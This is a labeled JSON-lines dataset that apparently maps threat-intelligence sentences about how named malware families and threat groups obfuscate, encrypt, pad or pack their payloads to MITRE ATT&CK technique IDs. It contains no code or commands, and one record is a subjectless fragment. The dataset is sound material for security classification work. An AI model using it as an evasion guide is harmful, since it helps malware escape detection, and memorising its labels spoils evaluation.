{"text1":"A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1027']"}
{"text1":"A Volgmer variant is encoded using a simple XOR cipher.","labels":"['T1027']"}
{"text1":"APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.","labels":"['T1027']"}
{"text1":"APT18 obfuscates strings in the payload.","labels":"['T1027']"}
{"text1":"APT19 used Base64 to obfuscate commands and the payload.","labels":"['T1027']"}
{"text1":"APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.","labels":"['T1027']"}
{"text1":"APT29 has used encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"APT3 obfuscates files or information to help evade defensive measures.","labels":"['T1027']"}
{"text1":"APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. APT32 has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat\" (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.","labels":"['T1027']"}
{"text1":"APT33 has used base64 to encode payloads.","labels":"['T1027']"}
{"text1":"APT34 has used base64-encoded files that are dropped to victims.","labels":"['T1027']"}
{"text1":"APT37 obfuscates strings and payloads.","labels":"['T1027']"}
{"text1":"Action RAT's commands, strings, and domains can be Base64 encoded within the payload.","labels":"['T1027']"}
{"text1":"Anchor has obfuscated code with stack strings and string encryption.","labels":"['T1027']"}
{"text1":"AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.","labels":"['T1027']"}
{"text1":"AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.","labels":"['T1027']"}
{"text1":"Aria-body has used an encrypted configuration file for its loader.","labels":"['T1027']"}
{"text1":"Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.","labels":"['T1027']"}
{"text1":"AuditCred encrypts the configuration.","labels":"['T1027']"}
{"text1":"Avaddon has used encrypted strings.","labels":"['T1027']"}
{"text1":"Avenger has the ability to XOR encrypt files to be sent to C2.","labels":"['T1027']"}
{"text1":"BLINDINGCAN has obfuscated code using Base64 encoding.","labels":"['T1027']"}
|
|
{"text1":"BLUELIGHT has a XOR-encoded payload.","labels":"['T1027']"}
|
|
{"text1":"BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.","labels":"['T1027']"}
|
|
{"text1":"BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.","labels":"['T1027']"}
|
|
{"text1":"Bazar has used XOR, RSA2, and RC4 encrypted files.","labels":"['T1027']"}
|
|
{"text1":"BendyBear has encrypted payloads using RC4 and XOR.","labels":"['T1027']"}
|
|
{"text1":"BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.","labels":"['T1027']"}
|
|
{"text1":"BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.","labels":"['T1027']"}
|
|
{"text1":"Blue Mockingbird has obfuscated the wallet address in the payload binary.","labels":"['T1027']"}
|
|
{"text1":"BoomBox can encrypt data using AES prior to exfiltration.","labels":"['T1027']"}
|
|
{"text1":"Bumblebee has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions.","labels":"['T1027']"}
|
|
{"text1":"CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.","labels":"['T1027']"}
|
|
{"text1":"Carbanak encrypts strings to make analysis more difficult.","labels":"['T1027']"}
|
|
{"text1":"Carberp has used XOR-based encryption to mask C2 server locations within the trojan.","labels":"['T1027']"}
|
|
{"text1":"Chimera has encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"Chinoxy has encrypted its configuration file.","labels":"['T1027']"}
|
|
{"text1":"Cobalt Group obfuscated several scriptlets and code used on the victim\u2019s machine, including through use of XOR and RC4.","labels":"['T1027']"}
|
|
{"text1":"Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public\/private key pair to encrypt Beacon session metadata.","labels":"['T1027']"}
|
|
{"text1":"CoinTicker initially downloads a hidden encoded file.","labels":"['T1027']"}
|
|
{"text1":"ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.","labels":"['T1027']"}
|
|
{"text1":"Comnie uses RC4 and Base64 to obfuscate strings.","labels":"['T1027']"}
|
|
{"text1":"Conficker has obfuscated its code to prevent its removal from host machines.","labels":"['T1027']"}
|
|
{"text1":"Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.","labels":"['T1027']"}
|
|
{"text1":"CookieMiner has used base64 encoding to obfuscate scripts on the system.","labels":"['T1027']"}
|
|
{"text1":"Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.","labels":"['T1027']"}
|
|
{"text1":"DCSrv's configuration is encrypted.","labels":"['T1027']"}
|
|
{"text1":"DRATzarus can be partly encrypted with XOR.","labels":"['T1027']"}
|
|
{"text1":"Dacls can encrypt its configuration file with AES CBC.","labels":"['T1027']"}
|
|
{"text1":"DanBot can Base64 encode its payload.","labels":"['T1027']"}
|
|
{"text1":"Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.","labels":"['T1027']"}
|
|
{"text1":"DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.","labels":"['T1027']"}
|
|
{"text1":"Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64.","labels":"['T1027']"}
|
|
{"text1":"Diavol has Base64 encoded the RSA public key used for encrypting files.","labels":"['T1027']"}
|
|
{"text1":"Donut can generate encrypted, compressed\/encoded, or otherwise obfuscated code modules.","labels":"['T1027']"}
|
|
{"text1":"Dridex's strings are obfuscated using RC4.","labels":"['T1027']"}
|
|
{"text1":"Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 \u2013 0xAF to obfuscate payloads.","labels":"['T1027']"}
|
|
{"text1":"Drovorub has used XOR encrypted payloads in WebSocket client to server messages.","labels":"['T1027']"}
|
|
{"text1":"Dtrack has used a dropper that embeds an encrypted payload as extra data.","labels":"['T1027', 'T1027.009']"}
|
|
{"text1":"During C0015, the threat actors used Base64-encoded strings.","labels":"['T1027']"}
|
|
{"text1":"During Frankenstein, the threat actors ran encoded commands from the command line.","labels":"['T1027']"}
|
|
{"text1":"During Night Dragon, threat actors used a DLL that included an XOR-encoded section.","labels":"['T1027']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors executed an encoded VBScript file.","labels":"['T1027']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded.","labels":"['T1027']"}
|
|
{"text1":"During Operation Honeybee, the threat actors used Base64 to encode files with a custom key.","labels":"['T1027']"}
|
|
{"text1":"EKANS uses encoded strings in its process kill list.","labels":"['T1027']"}
|
|
{"text1":"Earth Lusca used Base64 to encode strings.","labels":"['T1027']"}
|
|
{"text1":"Ebury has obfuscated its strings with a simple XOR encryption with a static key.","labels":"['T1027']"}
|
|
{"text1":"Elderwood has encrypted documents and malicious executables.","labels":"['T1027']"}
|
|
{"text1":"Elise encrypts several of its files, including configuration files.","labels":"['T1027']"}
|
|
{"text1":"Ember Bear has obfuscated malware and malicious scripts to help avoid detection.","labels":"['T1027']"}
|
|
{"text1":"Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts.","labels":"['T1027']"}
|
|
{"text1":"EnvyScout can Base64 encode payloads.","labels":"['T1027']"}
|
|
{"text1":"Exaramel for Linux uses RC4 for encrypting the configuration.","labels":"['T1027']"}
|
|
{"text1":"Exaramel uses RC4 for encrypting the configuration.","labels":"['T1027']"}
|
|
{"text1":"FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.","labels":"['T1027']"}
|
|
{"text1":"FIN6 has used encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.","labels":"['T1027']"}
|
|
{"text1":"FIN8 has used environment variables and standard input (stdin) to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads.","labels":"['T1027']"}
|
|
{"text1":"FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.","labels":"['T1027']"}
|
|
{"text1":"Flagpro has been delivered within ZIP or RAR password-protected archived files.","labels":"['T1027']"}
|
|
{"text1":"FlawedGrace encrypts its C2 configuration files with AES in CBC mode.","labels":"['T1027']"}
|
|
{"text1":"FoggyWeb has been XOR-encoded.","labels":"['T1027']"}
|
|
{"text1":"For Operation Spalax, the threat actors used XOR-encrypted payloads.","labels":"['T1027']"}
|
|
{"text1":"Frankenstein has run encoded commands from the command line.","labels":"['T1027']"}
|
|
{"text1":"FruitFly executes and stores obfuscated Perl scripts.","labels":"['T1027']"}
|
|
{"text1":"GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.","labels":"['T1027']"}
|
|
{"text1":"GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.","labels":"['T1027']"}
|
|
{"text1":"Gallmaker obfuscated shellcode used during execution.","labels":"['T1027']"}
|
|
{"text1":"Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.","labels":"['T1027']"}
|
|
{"text1":"Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.","labels":"['T1027']"}
|
|
{"text1":"Gelsemium has the ability to compress its components.","labels":"['T1027']"}
|
|
{"text1":"GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.","labels":"['T1027']"}
|
|
{"text1":"GoldenSpy's uninstaller has base64-encoded its variables.","labels":"['T1027']"}
|
|
{"text1":"Goopy's decrypter has been inflated with junk code in between legitimate API functions, and also includes infinite loops to avoid analysis.","labels":"['T1027']"}
|
|
{"text1":"GravityRAT supports file encryption (AES with the key \"lolomycin2017\").","labels":"['T1027']"}
|
|
{"text1":"Green Lambert has encrypted strings.","labels":"['T1027']"}
|
|
{"text1":"GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.","labels":"['T1027']"}
|
|
{"text1":"GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.","labels":"['T1027']"}
|
|
{"text1":"Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.","labels":"['T1027']"}
|
|
{"text1":"H1N1 uses multiple techniques to obfuscate strings, including XOR.","labels":"['T1027']"}
|
|
{"text1":"HAWKBALL has encrypted the payload with an XOR-based algorithm.","labels":"['T1027']"}
|
|
{"text1":"HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.","labels":"['T1027']"}
|
|
{"text1":"HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.","labels":"['T1027']"}
|
|
{"text1":"HermeticWizard has the ability to encrypt PE files with a reverse XOR loop.","labels":"['T1027']"}
|
|
{"text1":"Hi-Zor uses various XOR techniques to obfuscate its components.","labels":"['T1027']"}
|
|
{"text1":"HiddenWasp encrypts its configuration and payload.","labels":"['T1027']"}
|
|
{"text1":"Higaisa used Base64 encoded compressed payloads.","labels":"['T1027']"}
|
|
{"text1":"Hildegard has encrypted an ELF file.","labels":"['T1027']"}
|
|
{"text1":"HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.","labels":"['T1027']"}
|
|
{"text1":"ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.","labels":"['T1027']"}
|
|
{"text1":"IceApple can use Base64 and \"junk\" JavaScript code to obfuscate information.","labels":"['T1027']"}
|
|
{"text1":"If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an Alternate Data Stream (ADS) named kernel32.dll that is saved in \"%PROGRAMDATA%\\Windows\\\".","labels":"['T1027']"}
|
|
{"text1":"Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.","labels":"['T1027']"}
|
|
{"text1":"In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.","labels":"['T1027']"}
|
|
{"text1":"Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.","labels":"['T1027']"}
|
|
{"text1":"InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.","labels":"['T1027']"}
|
|
{"text1":"InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.","labels":"['T1027']"}
|
|
{"text1":"KGH_SPY has used encrypted strings in its installer.","labels":"['T1027']"}
|
|
{"text1":"KOCTOPUS has obfuscated scripts with the BatchEncryption tool.","labels":"['T1027']"}
|
|
{"text1":"KONNI is heavily obfuscated and includes encrypted configuration files.","labels":"['T1027']"}
|
|
{"text1":"Kerrdown can encrypt, encode, and compress multiple layers of shellcode.","labels":"['T1027']"}
|
|
{"text1":"Kessel's configuration is hardcoded and RC4 encrypted within the binary.","labels":"['T1027']"}
|
|
{"text1":"Kevin has Base64-encoded its configuration file.","labels":"['T1027']"}
|
|
{"text1":"KillDisk uses VMProtect to make reverse engineering the malware more difficult.","labels":"['T1027']"}
|
|
{"text1":"Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.","labels":"['T1027']"}
|
|
{"text1":"LazyScripter has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques.","labels":"['T1027']"}
|
|
{"text1":"Leviathan has obfuscated code using base64 and gzip compression.","labels":"['T1027']"}
|
|
{"text1":"LightNeuron encrypts its configuration files with AES-256.","labels":"['T1027']"}
|
|
{"text1":"Lokibot has obfuscated strings with base64 encoding.","labels":"['T1027']"}
|
|
{"text1":"LoudMiner has obfuscated various scripts and encrypted DMG files.","labels":"['T1027']"}
|
|
{"text1":"MCMD can Base64 encode output strings prior to sending to C2.","labels":"['T1027']"}
|
|
{"text1":"Machete employed some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.","labels":"['T1027']"}
|
|
{"text1":"Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.","labels":"['T1027']"}
|
|
{"text1":"Many strings in JHUHUGIT are obfuscated with a XOR algorithm.","labels":"['T1027']"}
|
|
{"text1":"Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.","labels":"['T1027']"}
|
|
{"text1":"Metamorfo has encrypted payloads and strings.","labels":"['T1027']"}
|
|
{"text1":"Micropsia obfuscates the configuration with a custom Base64 and XOR.","labels":"['T1027']"}
|
|
{"text1":"Milan can encode files containing information about the targeted system.","labels":"['T1027']"}
|
|
{"text1":"Molerats has delivered compressed executables within ZIP files to victims.","labels":"['T1027']"}
|
|
{"text1":"More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.","labels":"['T1027']"}
|
|
{"text1":"Moses Staff has used obfuscated web shells in their operations.","labels":"['T1027']"}
|
|
{"text1":"Mosquito\u2019s installer is obfuscated with a custom crypter.","labels":"['T1027']"}
|
|
{"text1":"Most strings in USBStealer are encrypted using 3DES and XOR and reversed.","labels":"['T1027']"}
|
|
{"text1":"MuddyWater has used Daniel Bohannon\u2019s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"NanHaiShu encodes files in Base64.","labels":"['T1027']"}
|
|
{"text1":"NanoCore\u2019s plugins were obfuscated with Eazfuscator.NET 3.3.","labels":"['T1027']"}
|
|
{"text1":"OLDBAIT obfuscates internal strings and unpacks them at startup.","labels":"['T1027']"}
|
|
{"text1":"Operation Wocao has executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.","labels":"['T1027']"}
|
|
{"text1":"P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.","labels":"['T1027']"}
|
|
{"text1":"POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.","labels":"['T1027']"}
|
|
{"text1":"POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. POWERSTATS has used PowerShell code with custom string obfuscation.","labels":"['T1027']"}
|
|
{"text1":"PS1 is distributed as a set of encrypted files and scripts.","labels":"['T1027']"}
|
|
{"text1":"PUNCHBUGGY has hashed most of its code's functions and encrypted payloads with base64 and XOR.","labels":"['T1027']"}
|
|
{"text1":"PlugX can use API hashing and modify the names of strings to evade detection.","labels":"['T1027']"}
|
|
{"text1":"PoetRAT has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.","labels":"['T1027']"}
|
|
{"text1":"PoisonIvy hides any strings related to its own indicators of compromise.","labels":"['T1027']"}
|
|
{"text1":"PolyglotDuke can custom encrypt strings.","labels":"['T1027']"}
|
|
{"text1":"Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.","labels":"['T1027']"}
|
|
{"text1":"PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).","labels":"['T1027', 'T1027.003']"}
|
|
{"text1":"PowerPunch can use Base64-encoded scripts.","labels":"['T1027']"}
|
|
{"text1":"PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.","labels":"['T1027']"}
|
|
{"text1":"PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.","labels":"['T1027']"}
|
|
{"text1":"QUADAGENT was likely obfuscated using Invoke-Obfuscation.","labels":"['T1027']"}
|
|
{"text1":"QakBot can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.","labels":"['T1027']"}
|
|
{"text1":"REvil has used encrypted strings and configuration files.","labels":"['T1027']"}
|
|
{"text1":"ROKRAT can encrypt data prior to exfiltration by using an RSA public key.","labels":"['T1027']"}
|
|
{"text1":"RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.","labels":"['T1027']"}
|
|
{"text1":"Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.","labels":"['T1027']"}
|
|
{"text1":"Reaver encrypts some of its files with XOR.","labels":"['T1027']"}
|
|
{"text1":"RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.","labels":"['T1027']"}
|
|
{"text1":"Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths.","labels":"['T1027']"}
|
|
{"text1":"Rifdoor has encrypted strings with a single byte XOR algorithm.","labels":"['T1027']"}
|
|
{"text1":"Rocke has modified UPX headers after packing files to break unpackers.","labels":"['T1027']"}
|
|
{"text1":"SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.","labels":"['T1027']"}
|
|
{"text1":"SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.","labels":"['T1027']"}
|
|
{"text1":"SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.","labels":"['T1027']"}
|
|
{"text1":"STARWHALE has been obfuscated with hex-encoded strings.","labels":"['T1027']"}
|
|
{"text1":"SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion MsBuild.exe process.","labels":"['T1027']"}
|
|
{"text1":"SUPERNOVA contained Base64-encoded strings.","labels":"['T1027']"}
|
|
{"text1":"Sakula uses single-byte XOR obfuscation to obfuscate many of its files.","labels":"['T1027']"}
|
|
{"text1":"SamSam has been seen using AES or DES to encrypt payloads and payload components.","labels":"['T1027']"}
|
|
{"text1":"Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.","labels":"['T1027']"}
|
|
{"text1":"Seasalt obfuscates configuration data.","labels":"['T1027']"}
|
|
{"text1":"ShadowPad has encrypted its payload, a virtual file system, and various files.","labels":"['T1027']"}
|
|
{"text1":"Shamoon contains base64-encoded strings.","labels":"['T1027']"}
|
|
{"text1":"Shark can use encrypted and encoded files for C2 configuration.","labels":"['T1027']"}
|
|
{"text1":"ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.","labels":"['T1027']"}
|
|
{"text1":"ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.","labels":"['T1027']"}
|
|
{"text1":"Sibot has obfuscated scripts used in execution.","labels":"['T1027']"}
|
|
{"text1":"Sidewinder has used base64 encoding and ECDH-P256 encryption for scripts and files.","labels":"['T1027']"}
|
|
{"text1":"Silence has used environment variable string substitution for obfuscation.","labels":"['T1027']"}
|
|
{"text1":"Siloscape itself is obfuscated and uses obfuscated API calls.","labels":"['T1027']"}
|
|
{"text1":"Skidmap has encrypted its main payload using 3DES.","labels":"['T1027']"}
|
|
{"text1":"Sliver can encrypt strings at compile time.","labels":"['T1027']"}
|
|
{"text1":"Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.","labels":"['T1027']"}
|
|
{"text1":"SodaMaster can use \"stackstrings\" for obfuscation.","labels":"['T1027']"}
|
|
{"text1":"SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.","labels":"['T1027']"}
|
|
{"text1":"Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.","labels":"['T1027']"}
|
|
{"text1":"Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.","labels":"['T1027']"}
|
|
{"text1":"Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.","labels":"['T1027']"}
|
|
{"text1":"Some strings in HOMEFRY are obfuscated with XOR x56.","labels":"['T1027']"}
|
|
{"text1":"SoreFang has the ability to encode and RC6 encrypt data sent to C2.","labels":"['T1027']"}
|
|
{"text1":"SpeakUp encodes its second-stage payload with Base64.","labels":"['T1027']"}
|
|
{"text1":"Squirrelwaffle has been obfuscated with a XOR-based algorithm.","labels":"['T1027']"}
|
|
{"text1":"StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.","labels":"['T1027']"}
|
|
{"text1":"StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.","labels":"['T1027']"}
|
|
{"text1":"Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.","labels":"['T1027']"}
|
|
{"text1":"SynAck payloads are obfuscated prior to compilation to inhibit analysis and\/or reverse engineering.","labels":"['T1027']"}
|
|
{"text1":"SysUpdate can encrypt and encode its configuration file.","labels":"['T1027']"}
|
|
{"text1":"TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.","labels":"['T1027']"}
|
|
{"text1":"Taidoor can use encrypted string blocks for obfuscation.","labels":"['T1027']"}
|
|
{"text1":"TeamTNT has encrypted its binaries via AES and encoded files using Base64.","labels":"['T1027']"}
|
|
{"text1":"The FIVEHANDS payload is encrypted with AES-128.","labels":"['T1027']"}
|
|
{"text1":"The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.","labels":"['T1027']"}
|
|
{"text1":"The Helminth config file is encrypted with RC4.","labels":"['T1027']"}
|
|
{"text1":"ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR.","labels":"['T1027']"}
|
|
{"text1":"Torisma has been Base64 encoded and AES encrypted.","labels":"['T1027']"}
|
|
{"text1":"Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.","labels":"['T1027']"}
|
|
{"text1":"Tropic Trooper has encrypted configuration files.","labels":"['T1027']"}
|
|
{"text1":"Turian can use VMProtect for obfuscation.","labels":"['T1027']"}
|
|
{"text1":"UBoatRAT encrypts instructions in the payload using a simple XOR cipher.","labels":"['T1027']"}
|
|
{"text1":"UNC2452 used encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk. Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"Valak has the ability to base64 encode and XOR encrypt strings.","labels":"['T1027']"}
|
|
{"text1":"Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions.","labels":"['T1027']"}
|
|
{"text1":"Waterbear has used RC4 encrypted shellcode and encrypted functions.","labels":"['T1027']"}
|
|
{"text1":"WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage.","labels":"['T1027']"}
|
|
{"text1":"Whitefly has encrypted the payload used for C2.","labels":"['T1027']"}
|
|
{"text1":"WindTail can be delivered as a compressed, encrypted, and encoded payload.","labels":"['T1027']"}
|
|
{"text1":"Winnti for Linux can encode its configuration file with single-byte XOR encoding.","labels":"['T1027']"}
|
|
{"text1":"Winnti for Windows has the ability to encrypt and compress its payload.","labels":"['T1027']"}
|
|
{"text1":"Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"ZeroT has encrypted its payload with RC4.","labels":"['T1027']"}
|
|
{"text1":"Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload. Zeus Panda also encrypts all configuration and settings in AES and RC4.","labels":"['T1027']"}
|
|
{"text1":"hides any strings related to its own indicators of compromise.","labels":"['T1027', 'T1027']"}
|
|
{"text1":"jRAT\u2019s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.","labels":"['T1027']"}
|
|
{"text1":"njRAT has included a base64 encoded executable.","labels":"['T1027']"}
|
|
{"text1":"A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.","labels":"['T1027.001']"}
|
|
{"text1":"APT29 has used large file sizes to avoid detection.","labels":"['T1027.001']"}
|
|
{"text1":"BRONZE BUTLER downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.","labels":"['T1027.001']"}
|
|
{"text1":"Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.","labels":"['T1027.001']"}
|
|
{"text1":"Bisonal has appended random binary data to the end of itself to generate a large binary.","labels":"['T1027.001']"}
|
|
{"text1":"CORESHELL contains unused machine instructions in a likely attempt to hinder analysis.","labels":"['T1027.001']"}
|
|
{"text1":"Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.","labels":"['T1027.001']"}
|
|
{"text1":"CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code.","labels":"['T1027.001']"}
|
|
{"text1":"Ember Bear has added extra spaces between JavaScript code characters to increase the overall file size.","labels":"['T1027.001']"}
|
|
{"text1":"FatDuke has been packed with junk code and strings.","labels":"['T1027.001']"}
|
|
{"text1":"Gamaredon Group has obfuscated .NET executables by inserting junk code.","labels":"['T1027.001']"}
|
|
{"text1":"Gelsemium can use junk code to hide functions and evade detection.","labels":"['T1027.001']"}
|
|
{"text1":"Goopy has had null characters padded in its malicious DLL payload.","labels":"['T1027.001']"}
|
|
{"text1":"GrimAgent has the ability to add bytes to change the file hash.","labels":"['T1027.001']"}
|
|
{"text1":"Higaisa performed padding with null bytes before calculating its hash.","labels":"['T1027.001']"}
|
|
{"text1":"Javali can use large obfuscated libraries to hinder detection and analysis.","labels":"['T1027.001']"}
|
|
{"text1":"Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.","labels":"['T1027.001']"}
|
|
{"text1":"Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.","labels":"['T1027.001']"}
|
|
{"text1":"Mustang Panda has used junk code within their DLL files to hinder analysis.","labels":"['T1027.001']"}
|
|
{"text1":"Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.","labels":"['T1027.001', 'T1027.005']"}
|
|
{"text1":"TAINTEDSCRIBE can execute \"FileRecvWriteRand\" to append random bytes to the end of a file received from C2.","labels":"['T1027.001']"}
|
|
{"text1":"ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.","labels":"['T1027.001']"}
|
|
{"text1":"A FinFisher variant uses a custom packer.","labels":"['T1027.002']"}
|
|
{"text1":"A Patchwork payload was packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"A version of Daserf uses the MPRESS packer.","labels":"['T1027.002']"}
|
|
{"text1":"APT29 used UPX to pack files.","labels":"['T1027.002']"}
|
|
{"text1":"APT3 has been known to pack their tools.","labels":"['T1027.002']"}
|
|
{"text1":"APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.","labels":"['T1027.002']"}
|
|
{"text1":"APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection.","labels":"['T1027.002']"}
|
|
{"text1":"Anchor has come with a packed payload.","labels":"['T1027.002']"}
|
|
